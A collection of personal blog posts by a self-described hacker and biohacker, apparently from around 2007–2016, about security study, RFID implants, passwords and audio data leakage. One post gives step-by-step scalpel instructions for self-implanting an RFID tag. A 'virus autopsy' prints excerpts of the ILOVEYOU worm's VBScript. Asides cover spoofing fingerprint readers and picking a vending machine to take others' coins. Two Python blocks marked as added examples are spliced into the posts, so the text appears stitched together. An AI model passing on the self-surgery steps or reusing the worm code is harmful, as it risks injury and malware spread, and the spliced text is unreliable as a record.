Showing posts with label security. Show all posts


the winter feast

it will probably be christmas day by the time most of you read this, or later. i hope you have or had a good day wherever you were or whatever you were doing. may 2017 be less shit than 2016 was.

if you sent me email in the last year, i'm really sorry for not replying to you. i do read most of what arrives but there's a high volume of spam plus a similarly high volume of legit emails, so it's hard to reply to them all when you have no motivation to do ordinary day to day tasks and even less to interact with people.

my partner is looking after me - he's doing a good job. i have not been very well this last year, and it didn't help that i spent about six months trying to do a networking qualification that was too advanced for me and not actually relevant to my eventual CEH qualification since i already know basic networking (it turns out that the one i was trying to do, the CompTIA Network+, is actually quite high level and involves a LOT of background reading for someone who has been on the programming or security side of things rather than the network engineering side. it's probably a fantastic exam to take if you want to be able to understand the logistics of every network everywhere and be able to engineer the perfect network for the situation your clients are in, every time, but it is way too in depth for a hacker to learn from scratch.) i've contacted the training provider about this & luckily they were really understanding - they apologised for having suggested the Network+ to me on the phone, and reset the time i had paid for so that i didn't pay for six months of wasted training and stress that got me nowhere. i'm currently working on the CompTIA Security+ & should be going back to that after christmas. i haven't done lots and lots of it but it seems like it's a lot closer to what i've been teaching myself for all this time than the Network+ was.

i am trying to be more accessible this coming year. my immediate plans are to attempt to restart my haptic compass project, and to complete my magnetic implant array. this will eventually also involve removing the failed experimental debris left in my right small finger (this debris is what you could see in the short BBC3 documentary, for those that asked - it is the encapsulated remains of a node whose experimental covering i was testing. it no longer works and will have to be removed before i can use the space to install a new node but this would be a long and involved surgery with a lot of pain and for this reason i have been avoiding it.)

merry christmas to you all, and many happy winters to come




new hardware

i finally have replacement hardware, a Lenovo laptop replete with Windows Vista. Fedora Core 9 comes out on Tuesday, so i'll be jacked up and Linified by Tuesday night and waiting to dump more newbie-hacker crap on y'all. i also have new custom ink lined up for then, and a couple new piercings doing their best to heal up within the confines of my slightly shit immune system, plus new (hot) Scottish nookie, so all in all i'm a pretty happy little bastard right now. i might even have a job.

anyway. a few challenges are gonna be working with the Broadcom chipset for wireless under Core 8 (i seem to remember that needing madwifi), making the weird combo memory card reader and the fingerprint auth device work at all - especially the fingerprinter, i'll be fucking chuffed if i can get that shit working. it's a swiper rather than a presser, too, which makes it harder to hack; i'd want to dust the keyboard, monitor and case for prints, relief one into a mould and make a gelatine finger to test that before i could say i was sure though. biosecurity is pretty cool, but we've all seen it's far from infallible.

it does give me a little more trust in Windows, though, although disturbingly i don't think the regular auth protocol has been disabled in favour of fingerprints. i'd have passwords required as well as prints, or as a backup only if the prints failed, but not as an either-or option...

so kids, fingerprints are fun but won't keep the robbers away, Scots are all hardcore motherfuckers, and remember - Tramadol fucks you up.



tramadol fucks you up #1113203

yeah, it's that time of the something again:

tramadol fuck me up
do tramadol fuck u up
how much tramadol does it take to get fucked up
can tramadol fuck you up?
solpadol tramadol
will tramadol fuck you up[
tramadol fucked up
does tramadol fuck you up?
hack userpic: i'm not teaching you how to create malicious images just so you can go fuck up a Windows user or two.

"tramadol fucks you up" is so gonna be the title of my autobiography.



i can't speak user

man, i now know what the word overload truly means. i'm trying to make a C program display tag output correctly, prototype a game-selling system interface, build (and understand) analogue sensors for my team's stupid-ass Lego robot, figure out how many photons per second are given off by a fucking 200W lightbulb (undergraduate quantum physics course), do laundry, read Anderson's seminal security engineering text, fix my damn Atheros card and calculate a dosage of dihydrocodeine that results in neither me bitchslapping my robotics team because the pain is pissing me off nor passing out in the corridors and getting groped and/or looted by the unscrupulous. it's a riot, sure, i'm as wired as i've ever been without the use of schmethamphetamines (fuck you, Google spider), but without stimulants, i just fucking collapse.

so instead of actually working, i'd like to point y'all to LSO's challenge server, that's why i'm still up at 3:30: it feels so good to get root, you'll forgo sleep.

which leads me to my actual point: techheads are always perceived as being isolated from "real life" (i'm not gonna go into the semantic idiocy of that phrase right now), but up until now i've seen that as a kind of stupid myth. this last month or so has really changed my mind.

starting up, people's reactions to the kind of shit that doesn't even get a shrug from a hacker. the chip in my hand inspires about 1 "hey that's cool" or "you could use that for X random application" for every 99 "oh my god that's so fucking gross get that the fuck out of your body you fucking headcase". i've been seeing weird discrepancies in how tech people react to the world compared to the machine-illiterate, too: walking into a classroom with two unlabelled doors, i say to the guy next to me, "you know, that's really bad interface design", and then realise that's a fucking stupid thing to think. likewise, i keep trying to hit Ctrl-C Ctrl-V when faced with having to copy out bits of meatspace paper, and forgetting not to use the word meatspace when that's where i am, and i know there are guys out there way worse than me.

the problem is, that doesn't only isolate you from students, it gives tech itself a bad image. it also makes it virtually impossible to interact with endusers and clients meaningfully - you write in your docs, "bitsetq -a -f -x -q" and your users look at you and go, "hay lepht wtf is terminal anyways?" equally, students who listen to you won't ask questions if they hear one huge pile of jargon and unfamiliar concepts, they just give up. i'm gonna have to learn to act like a normal human being if i wanna deal with these people, and that's a huge part of what my job involves.

i think i've been in denial about that, trying to convince myself i think the same way as a social scientist or a historian, and it's seeming more and more like i was bullshitting myself. i guess we all gotta learn to speak user; seems to me like otherwise, users won't speak to us.




fuck yeah, there's a chip in the hand i'm not typing with. it took longer and hurt more than i expected, but bled a lot less; the first thing i'm gonna do as a cyborg (pfft) is a. scare the shit outta the kiddies in the spring term's first lecture, and b. show you guys how to be just as irresponsible and foolhardy as me.

first up, i should explain why the fuck i did this. for a start, it's gonna make some awesome crypto projects - the chip is inherently insecure, seeing as how it broadcasts in cleartext, and i'm really fucking interested in how they can be incorporated into more secure systems. also, i've been wanting to do this just to prove to myself i could ever since reading Battle Angel Alita and being told by a seven-year-old that i couldn't take a pinprick without my pain pills (little shit). i think this and my countless liver-purgings sans analgesia have proved that kid wrong =] third, i did it cause i wanted to know what it was like, plain and simple.

second, why i did it this way, in a student bathroom, instead of having it shot in like a normal... dog whose owners don't wanna lose it. like i've yelled about before, .gov health services won't do this sorta thing for a few reasons: takes up real patients' time, isn't medically necessary, i might sue (yeah...). there's no vet in my part of town, and i doubt they'd do it anyway, so i was left on my own...

so how to do it? aw, here goes. i'm assuming you got a rice-grain type glass ampoule tag.

1. gather ya tools. you need a sterile scalpel (Swann-Morton disposables are the cleanest bet, but a boiled and Milton'd surgical knife would be way more efficient), wound spray or iodine for cleaning the area and the incision, gauzes, steri-strips, fabric strapping and cotton wool. also, it's good to have TCP or Milton liquid antiseptic on hand in case shit gets nasty. you're also gonna want a permanent marker, in addition to the tag itself.

2. find a buddy to help ya out (preferably a non-squeamish buddy who's at least a bio student) and a secure, clean bathroom or kitchen to do the "operation" in. it's this buddy's job to spot you, help you make the big cut, swab while you're inserting the chip, help you dress the wound and call 999 if you nick an artery.

3. get ya marker. now, put your hand flat on a surface. look for the triangular, vein-free area between the bones of your index finger and thumb; that's where we're gonna insert the chip. draw a solid line a centimetre long, in the clearest part of this area you can see, parallel to your thumb. you gotta get it the right way round though.

4. make sure the area is really clean, then wash your hands like you had TB and sterilise them all over with the wound spray or Milton. you can wear latex gloves if that's easier to work in. have your buddy wash and steri his hands too.

5. now for the pain. get something to bite, and make the first cut all the way along your marker guideline on your hand. it'll take about ten or twenty strokes of the scalpel before you get deep enough to insert anything, and brother, it will hurt like fuck. get your buddy to take over if you get the shakes, make sure you keep swabbing the blood away with Milton or whatever, and stop when you're about two mil deep and you can see distinct lips of skin on either side of the wound.

6. and now for the fucking nasty part. push the end of your ampoule chip underneath the 'lip' closest to the index finger bone, where it'll probably lodge. now shove that motherfucker in until you can't see any of it - it can go under the skin, you just need to force it. this will also hurt a lot, but just do it all at once or you'll never make it.

7. once you can't see any part of the tag, swab the wound until you can close it with steri-strips, then sterilise the whole hand again, and cover the strips with a gauze pad. bind your hand up real tight with the strapping and get yourself and your buddy a shot, cause bro, it's over.

so, uh, enjoy yourselves. more on this once it heals.



l's fedora project

okay, so you're running Windows. even worse, you're running Vista - no tools, no drivers, no nothing. what's more, you live under a pseudorepressive government with human rights-crushing surveillance powers and the sudden inclination to smash the shit out of every hacker and security consultant it comes across who can't prove they weren't using their tools for t3h_kr1mz, and you ran out of funding a good couple of years ago or so - well, my friends, then you're in my (slightly overdosed) situation, and it's Linux time.

on the advice of the peeps at LSO, which you should go check out, i've converted my crap little laptop to a Fedora Core 8 box. and now begins the fight.

(dings its little wrestling bell) round one - local cripple versus MADWifi 0.9.3, FIGHT!



for the last time:

tramadol fuck you up?
"windows scripting host\settings\timeout"
how much tramadol fucks you up
will tramadol fuck you up
does tramadol fuck you up
does Tramadol fuck you up ?
YES, for fuck's sake, tramadol fucks you up. it fucks you up bad. you won't be able to program properly, you sure as shit won't be able to do maths, you won't even feel like trying to do sports or anything active, you'll throw up all the time, you'll look and sound like an authentic pothead and you'll lose any interest you ever had in anything but sleep.

[kudos to the guy who kept looking for the Registry setting that messes with the WSH's timeout, though. it's under HKLM/Software/Microsoft/Windows iirc, and its main malicious use is to get rid of the timeout completely so viruses can run free and never be killed because of inactivity.]

mang, i hope i don't get readers who hate profanity.



idiocy has no lowest low

as demonstrated by the not one, but two students in my algorithms course who don't use any AV or firewalls whatsofuckingever on their Windows XP boxes. one of them refuses because Norton slows down his games (and apparently Norton is the only damn AV suite out there), and the other told me nonchalantly

"Oh, it's OK, I just wait until it gets really bad and then reinstall the operating system."
i can't believe i gotta do this, cause it's like having to give sex ed classes to nineteen-year-olds - in fact some of us are older than that - but here are the reasons why yeah, you do have to run AV:

1. you protect your data: i believe the American for that is duh. especially in university, where losing all your work will fuck you over good and proper, this should be one of your first priorities.

2. you also protect a hell of a lot more, because when you're at least moderately AV'd, you don't get drawn into botnets: that is, you don't fall to 10% of your system's capacity because your machine is running a DDoS attack on some Russian's ex, you don't get arrested for data fraud your compromised machine committed or the pr0n server you had no idea it had become, you don't suddenly find your hard drives the playground of a gang of twenty 1337-speaking SubSeven fans... you see where i'm going here.

3. your identity is a small margin safer when it's not at risk of being grabbed by trojans. that is, your identity which comprises access to your entire private life, your home, your finances, your job and employment history... yeah.

4. your browser history is shielded from cookie-spy trojans, which in turn means you're getting less spam, less ad downloaders, and therefore, you're less likely to get scammed or infected secondarily.

5. AV can also protect you from rogue P2P nodes, meaning you've got less of a chance of getting your ass RIAA'd.

6. your system is more under your control, making it a hell of a lot easier both to trace and retaliate against genuine attacks (rather than virus damage), and to see where memory is leaking - if there are virii loose all over the shop, you've got pretty much no chance of speeding the system up or getting any kind of security. without security apps, you're basically operating in a warzone that could just as easily be a comfortable living room.

7. you're not just endangering your own machine: if you're on my network with no AV, you're essentially a huge, neon-lit gateway to everything else that's on there, unsuspecting, thinking it's safe. one unprotected host compromises the entire net, making the damage inflicted by a virus on the net 100% your fault, and the costs of repair your liability.

all of that is a shorthand for the question why the fuck? having no antivirus is just as stupid as not using condoms, or refusing to lock your apartment door because you've never been robbed before. amazingly, however, the offenders know all this and still haven't done shit about it.

i'm debating whether it's justifiable to isolate their machines and hit them with something nasty just to spank them into submission. idiocy really does have no lowest low.



martian aliens they ate my Wijit

so you've all noticed the little Lijit widget over there in the top corner. some of you decided to play hooky with the widget, too. here's what you asked me for this week:

1. solpadol (8 times) look, you can't have my meds, OK? it's my Solpadol, and you'll have to beat me up to get it. why don't any of you want the Diproflex or the Zopiclone, anyway?
2. label (2 times) huh?
3. 1190311124113 (2 times) i'll explain this in a second.
4. anonym for arrogant (1 time) no, Anonym for President! i'm pretty much against arrogant.
5. 1190068085886 (1 time)
6. 1190068226397 (1 time)
7. atheist golden rule (1 time) you want this here rule.
8. -1 (1 time)
9. 1190480612750 (1 time)

okay, so what the fuck is with these number string searches? i got two hypotheses myself: 1. DoS / code injection attempt from a moron, and 2. attempt by aliens to find the last digit of pi by sending bits of the known sequence to me, an obvious expert in theoretical mathematics.

a tenner says it's aliens.


ed.: in addition to the Wijit, i finally got my ass on sitemeter. stats widget is at the bottom of the sidebar; scroll on down and satisfy your lust for statistics. - L


to the CCTV operators:

yes, it is i you see march into the laboratory foyer at 1639 determined to grab a Snickers. it is i you see shoving coins into the vendi and kicking it when it doesn't work, and it is also i who can then be observed using a high-grade Southord C2010 pick set to get both the coins i lost and the coins everyone else lost outta the damn slot where they're all stuck. for the three minutes or so it takes me to do that, you may also observe three security guards walk right past me, one of whom stops and immediately walks away after i give him the explanation (and i quote) "Locksmith."

and that is why i am now £5.25 richer, and also have both Snickers and much less confidence in you guys. i mean, you're in the damn lab building, for fuck's sake.


virus autopsy: ILOVEYOU, pt.2

*click* returning to the autopsy of the ILOVEYOU virus. time is 2340, at the last session we saw the subject's mechanisms for stopping timeouts, allowing itself to remain active indefinitely. it's time to look at some more. forceps!

' Create 3 copies of the script in Windows, system and in the temporary folders
set dirwin = fso.GetSpecialFolder(0)
set dirsystem = fso.GetSpecialFolder(1)
set dirtemp = fso.GetSpecialFolder(2)
set c = fso.getFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirtemp&"\LOVE-LETTER-FOR-YOU.TXT.vbs")

ah, how very devious! how marvellously malicious... or perhaps not. (note the inelegant coding, once again.) what it's doing here is using the fso object it created earlier to copy itself to three locations: the root of the Windows directory, that of the temp directory, and that of the System directory. these are generally the first three locations modern AV software will scan, because they're obvious choices. let's see what it wants to do next. scalpel!

' Adjust Internet Explorer's standard starting page to one of the 4 URLs, in order to download data that you will be able to launch
'download. If this data has already been downloaded it will automatically be started next time Windows is booted
'and the start page of Internet Explorer is reset to a blank page.
regruns()
'create an HTML that launches the component ActiveX as well as one of the copies of the script
html()
' Send the copy of the script to all entries in the Outlook address book
spreadtoemail()
'overwrite specific data using the script
'if the data are not yet scripts, script data with the same name as the data are created
'with the ending .vbs
'delete the original data
'a script that automatically sends the Email worm to all persons in the IRC channel is attached to Mirc
listadriv()
end sub

hm. here we see it calling four subroutines, regruns(), html(), spreadtoemail(), and listadriv(), and quitting. next time we'll be looking at the regruns() process, its first port of call. shove it back in the freezer, nurse. time is 0011. *click*


virus autopsy: ILOVEYOU, part 1

*click* 2213 hours. subject... whoof, subject's been in the virus mortuary for a good long while now, that's disgusting. subject appears to have been a VBScript email-propagator by the name of ILOVEYOU, received as an attachment and requiring a manual launch by the user to activate.

scalpel. thorax incision reveals...

rem barok -loveletter(vbe) (i hate go to school)
rem by: spyder / / @GRAMMERSoft Group / Manila, Philippines
On Error Resume Next
dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy
eq = ""
ctr = 0
set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
vbscopy = file.ReadAll

ach, handkerchief. handkerchief! thank you nurse. aside from an infestation of bad English, subject is Filipino and seems to have been healthy at time of death. here you see the variable declarations, all in good health, and the inelegant initialisations of three of them just to read the filesystem... i'll remove them and go under the ribcage.

main()

sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
' checks the time out of Windows scripting host
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
' change the script to endless:
wscr.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD")
end if

alright, hold it there, nurse. you see that? the thing's setting the Windows Scripting Host's script timeout to zero, to stop the host from timing out and killing the script before it's finished. devious, but not devious enough... i think we're done for tonight, nurse.
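a defender's check for the two registry tricks seen in this autopsy (and the WSH timeout key from the "for the last time" post): an added example, not code from the post or from the worm. it parses a constructed .reg export and flags a zeroed Windows Scripting Host Timeout plus autorun entries that launch dropped .vbs files. the Run-key entries in the sample are an assumed persistence mechanism for illustration, since this part of the autopsy stops before regruns().

```python
"""Audit a Windows .reg export for ILOVEYOU-style registry tricks.

Added example, not from the original post or the worm. The sample export is
constructed; the Run-key entry is an assumed persistence method used only
to illustrate the check.
"""
import re

# Scripting Host settings keys. The HKCU path is the one the worm writes to;
# HKLM is added as an assumption so a per-machine setting is also covered.
WSH_TIMEOUT_KEYS = {
    r"HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings",
    r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Scripting Host\Settings",
}
# Filenames the autopsy shows the worm copying into Windows, System and Temp.
DROPPED_NAMES = {"mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt.vbs"}

# Constructed sample export: per-user timeout zeroed, per-machine left at 30s,
# one assumed autorun entry pointing at a dropped script, one benign entry.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings]
"Timeout"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Scripting Host\Settings]
"Timeout"=dword:0000001e

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"MSKernel32"="C:\\WINDOWS\\SYSTEM\\MSKernel32.vbs"
"Backup"="C:\\Tools\\backup.exe"
"""

_VALUE_RE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text):
    """Return {key_path: {value_name: (type, value)}} for the subset of .reg
    syntax used here: [key] headers, "name"="string" and "name"=dword:hex."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if not m or current is None:
            continue
        name, data = m.group(1), m.group(2)
        if data.startswith("dword:"):
            keys[current][name] = ("REG_DWORD", int(data[6:], 16))
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            # .reg exports escape backslashes in string data as \\
            keys[current][name] = ("REG_SZ", data[1:-1].replace("\\\\", "\\"))
    return keys


def is_suspicious_script(path):
    """True for a dropped filename or any double-extension .vbs (e.g. .TXT.vbs)."""
    base = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return base in DROPPED_NAMES or re.search(r"\.\w+\.vbs$", base) is not None


def audit(keys):
    """Return a list of human-readable findings for the parsed export."""
    findings = []
    for path, values in keys.items():
        if path in WSH_TIMEOUT_KEYS and values.get("Timeout", (None, None))[1] == 0:
            findings.append(f"WSH script timeout disabled (Timeout=0) under {path}")
        if path.lower().endswith((r"\run", r"\runservices")):
            for name, (vtype, data) in values.items():
                if vtype == "REG_SZ" and is_suspicious_script(data):
                    findings.append(f"autorun entry {name!r} launches script {data}")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_REG)):
        print(finding)
```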

next time, we're gonna be getting to the real meat of this autopsy - i'll be dissecting the main processes of the virus, and you'll get to be personally splattered in the gore.


but i am invincible!

today, we sit our asses down in the morgue of the computer world, the University lab, for a simple post-mortem. as you've probably gathered, the networks i get to play with here are huge; massive, dynamic systems, thousands of terminals, hundreds of printers, upwards of twenty main servers and i don't even wanna know how many miles of 1000BASE-T cable. it's fairly well-secured, and not thanks to me (hell, i didn't set the security systems up): the labs are secured by swipecard access, you can't logon without a current username and password, and the password system is... adequate. the Unix servers are actually very well-defended, i can tell you.

and yet it's not secure. it is possible to hack the main server in three steps.

i'll give you a hint: the first step is to walk up the stairs to the helpdesk, which is in the Department's offices and not the Directorate's: the Department is the teaching arm of Computing, whereas the Directorate handles the running of labs, the wireless, username allocation, email and all the rest of the machine shit that the non-inducted use on a daily basis.

winner is the first who can tell me how. there's no prize, just glory.


crypto? is that some Southern kid's name?

i'm always amazed at this. on looking at the passwords for a small section of a network, i found that despite the strict password policy, all the passwords but three - out of several hundred - were words. the policy demands alphanumerics and mixed case, so most users had a "Password123"... oy.

i asked a couple other users what the hell was with that. the response?

"Well, normal people can't remember codes."

like fuck they can't. i'm a normal person, apart from being slightly better educated than the general public, and i remember about 10 different alphanumeric codes with random punctuation marks for all the different shit i have to authenticate to in a day (use mnemonics!). if you have to use each code once or twice a day, it really isn't difficult to memorize them; and these other students only have the one system password that's enforced to be so complex. the rest of their passwords, for all the things i keep seeing them wasting their time with - Bebo or Myspace, usually (you know what i think of Bebo and Myspace) - are set by themselves, of course, and they're uniformly simple.

so what's the problem? why can't you remember one code? i guess that's a question for a psychologist. my problem with this is that when they can't remember it, they write it down; and when they write codes down, the security of our collective system is down to someone not finding the paper.

obviously, that ain't acceptable. my solution with my own citadel was to implement a token system, which i'm in the process of linking to a chip in my hand (more on that when it's more developed) - and i'm unfortunately not allowed to RFID my compatriots. but i still think the token idea stands, and i'd kill to have a say on whether or not it's implemented here.

here's how the simplest token protocol works, from the seminal textbook, Ross Anderson's Security Engineering:

you have a token, a little transponder thing that can be shaped like a key, or a button, or even embedded in your ID card or something. i have a gate, or a door. you walk up to the door, and your token sends a string to the door's receiver:

token -> gate: serial number, {serial number, onetime number}

the stuff in braces is encrypted under a key known to both the transponder and the receiver, meaning my gate can then decrypt it, check that the two serial numbers match, check that the onetime (Anderson calls it a nonce, but in my country that's slang for a child molester...) hasn't been used already (this way i know you're not just replaying someone else's earlier access attempt) and let you in.

now, replace the gate with the logon system, and you're flying. it's a little more difficult than that, unfortunately, so i won't be seeing it around here anytime soon. unfortunately, the fact remains: this kind of system is the only way to let normal people slack off remembering their codes.
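the token -> gate exchange above, worked through in Python as an added example (not Anderson's code and not the post's own): a token sends its serial in the clear plus {serial, onetime number} sealed under the shared key, and the gate checks the seal, the serial match and the nonce before admitting. the "encryption" is a stand-in built from HMAC-SHA256 (a keystream plus a tag) for the block cipher a real transponder would use; the serials, keys and counter-based onetime numbers are constructed.

```python
"""Token/gate protocol from the post: T -> G: serial, {serial, nonce}_K.

Added example. The seal()/unseal() pair is a stand-in for a real cipher:
HMAC-SHA256 used as a keystream (encrypt) and as a tag (authenticate).
"""
import hashlib
import hmac
import os


def _keystream(key: bytes, iv: bytes, n: int) -> bytes:
    """Derive n keystream bytes from key and iv (counter mode over HMAC)."""
    out, counter = b"", 0
    while len(out) < n:
        out += hmac.new(key, iv + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:n]


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: returns iv || ciphertext || tag."""
    iv = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, iv, len(plaintext))))
    tag = hmac.new(key, iv + ct, hashlib.sha256).digest()
    return iv + ct + tag


def unseal(key: bytes, blob: bytes):
    """Verify the tag in constant time, then decrypt; None if tampered."""
    if len(blob) < 48:
        return None
    iv, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, iv + ct, hashlib.sha256).digest()):
        return None
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, iv, len(ct))))


class Token:
    """Transponder: knows its serial and the key it shares with the gate."""

    def __init__(self, serial: int, key: bytes):
        self.serial, self.key, self.counter = serial, key, 0

    def message(self):
        # The onetime number is a counter here; a seen-set on the gate side
        # makes replay detection independent of delivery order.
        self.counter += 1
        body = self.serial.to_bytes(4, "big") + self.counter.to_bytes(8, "big")
        return self.serial, seal(self.key, body)


class Gate:
    """Receiver: key table per serial, plus the nonces already accepted."""

    def __init__(self, keys: dict):
        self.keys = keys   # serial -> shared key
        self.seen = {}     # serial -> set of onetime numbers already used

    def admit(self, serial: int, blob: bytes) -> str:
        key = self.keys.get(serial)
        if key is None:
            return "deny: unknown token"
        body = unseal(key, blob)
        if body is None or len(body) != 12:
            return "deny: bad ciphertext"
        inner_serial = int.from_bytes(body[:4], "big")
        nonce = int.from_bytes(body[4:], "big")
        if inner_serial != serial:          # clear serial must match sealed serial
            return "deny: serial mismatch"
        used = self.seen.setdefault(serial, set())
        if nonce in used:                   # someone replaying an earlier attempt
            return "deny: replay"
        used.add(nonce)
        return "admit"


if __name__ == "__main__":
    k = os.urandom(32)
    gate, tok = Gate({7: k}), Token(7, k)
    s, blob = tok.message()
    print(gate.admit(s, blob))   # fresh attempt is admitted
    print(gate.admit(s, blob))   # same message again is a replay
```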

so: either ya remember your damn password, or you let a totally non-medically qualified, slightly paranoid security nut embed machinery in your hand. okay?

...where are you going?



a message from the User!

more correspondence on audio, this time from the man, James Atkinson of the Granite Island Group. i'm actually quite impressed that he replied to me in the first place, seeing as in this sphere, i'm kind of scum. a peasant of the white-hat world, if you will.

It is properly called "audio correlation" where a known audio signal (pressure waves) is induced into an area, and then those same signals are measured either as a physical movement elsewhere, or a matching electrical response is sought.

it's a little over my head, seeing as Atkinson is officially trained in TEMPEST, and i'm a dabbler, but i think this might mean you could use the audio signals as a means to verify an image of your target's monitor you obtained via other ways. i've asked him for clarification, and meanwhile, yours truly has about half an experiment proposal finished...

and now, on to today's a la carte special: crispy fried bitch with extra cheese. roquefort, no less.

otherwise known as "For fuck's sake, it's spelled 'ATHEIST'."

(baby-eating "athiest fundamentalist")


what time is it?

my fellow geeks of the Interweb: we may have some serious experimental fun on our hands, the kind that were i twelve years old i should spell "phun". i've received a reply from the admin of, who i won't name out of respect:

You're on the right track. Audial leakage of surveillance equipment is
used by counter-surveillance experts to pick up inadvertent signals.
Audial emanations of other electronic equipment are certainly
likely but I've not seen a study of it.
Let me know what you come up with, we've not published anything
on audial TEMPEST.

what time is it? it's EXPERIMENTATION TIME.



audial TEMPEST

sit down at any lab PC or perhaps at your home machine, jack in your headphones and reboot. during the boot sequence, and under various OSes, during periods of high system activity, you'll hear strange low-volume audial chatter - i'm pretty sure it's been abused by woos to make "electronic voice phenomena", in fact.

i got a different hypothesis about this chatter. i think it's a form of data leakage; like a Category III-risk optical TEMPEST indicator - a HDD status LED or the indicator LED on some routers and broadband modems - it seems to correspond to the data passing through the device. on a PC, you hear what seem to be unique patterns of chatter during application startups, writes to and reads from the HDD, and when joining or leaving a network.

this is to my curiosity what liquid oxygen is to a barbecue. i have got to find out whether data from my networks is leaking out the sound card as well as out the emissions of the components, the old-school cathode-ray monitors and half the LEDs on everything.

therefore, i have a new research project. i'll be back with all the existing research i can find on the subject ASAP. you guys are in for an ethically awesome, fact-finding, data-jacking, network-sniffing, audially-challenging goddamn adventure!

my Zero Cool-emulating childhood self would be really impressed with this.